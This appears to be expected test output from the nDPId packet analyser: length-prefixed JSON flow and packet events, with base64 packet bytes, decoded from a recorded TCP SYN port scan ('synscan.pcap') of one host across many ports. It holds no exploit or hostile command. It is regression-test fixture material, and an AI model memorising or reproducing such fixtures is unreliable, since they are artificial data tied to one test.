-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsbQQAADkGom6sEAAIQA2GNIzTBJfdU4MZAAAAAGACCAAr9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsM\/UAADUG332sEAAIQA2GNIzTE7rdU4MZAAAAAGACCAAc0gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAs+SIAACoGJVCsEAAIQA2GNIzTBFHdU4MZAAAAAGACDAAoOwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpUAAC8G6t2sEAAIQA2GNIzTgAXdU4MZAAAAAGACEACohgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXoEAADMGtvGsEAAIQA2GNIzTH0fdU4MZAAAAAGACEAAJRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3G0AADcGNQWsEAAIQA2GNIzTNdfdU4MZAAAAAGACEADytAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsF98AACkGB5SsEAAIQA2GNIzTGAzdU4MZAAAAAGACCAAYgAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsgIEAADEGlvGsEAAIQA2GNIzTxHzdU4MZAAAAAGACCABsDwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsTM8AADIGyaOsEAAIQA2GNIzTF+DdU4MZAAAAAGACDAAUrAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsGXIAACoGBQGsEAAIQA2GNIzTHvHdU4MZAAAAAGACDAANmwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsL2kAADAG6QmsEAAIQA2GNIzTAsrdU4MZAAAAAGACBAAxwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAszLEAACsGUMGsEAAIQA2GNIzTE4jdU4MZAAAAAGACEAAVBAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MEAADkGMrGsEAAIQA2GNIzTIZjdU4MZAAAAAGACCAAO9AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsA1UAADsGCh6sEAAIQA2GNIzTGgzdU4MZAAAAAGACEAAOgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs5vMAADIGL3+sEAAIQA2GNIzTBEzdU4MZAAAAAGACDAAoQAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsVVQAADoGuR6sEAAIQA2GNIzTFGbdU4MZAAAAAGACDAAYJgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs6cgAAC8GL6qsEAAIQA2GNIzTB7PdU4MZAAAAAGACEAAg2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNgAACcGxJqsEAAIQA2GNIzSBd3dUoMYAAAAAGACEAAisgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsT+AAADQGxJKsEAAIQA2GNIzSCirdUoMYAAAAAGACBAAqZQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAshDcAACsGmTusEAAIQA2GNIzSBIvdUoMYAAAAAGACEAAkBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsO+EAACwG4JGsEAAIQA2GNIzSBBXdUoMYAAAAAGACBAAwegAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs79wAADMGJZasEAAIQA2GNIzSAGrdUoMYAAAAAGACEAAoJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsp8sAACsGdaesEAAIQA2GNIzSBCXdUoMYAAAAAGACEAAkagAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsa5sAADsGodesEAAIQA2GNIzSB7TdUoMYAAAAAGACEAAg2wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 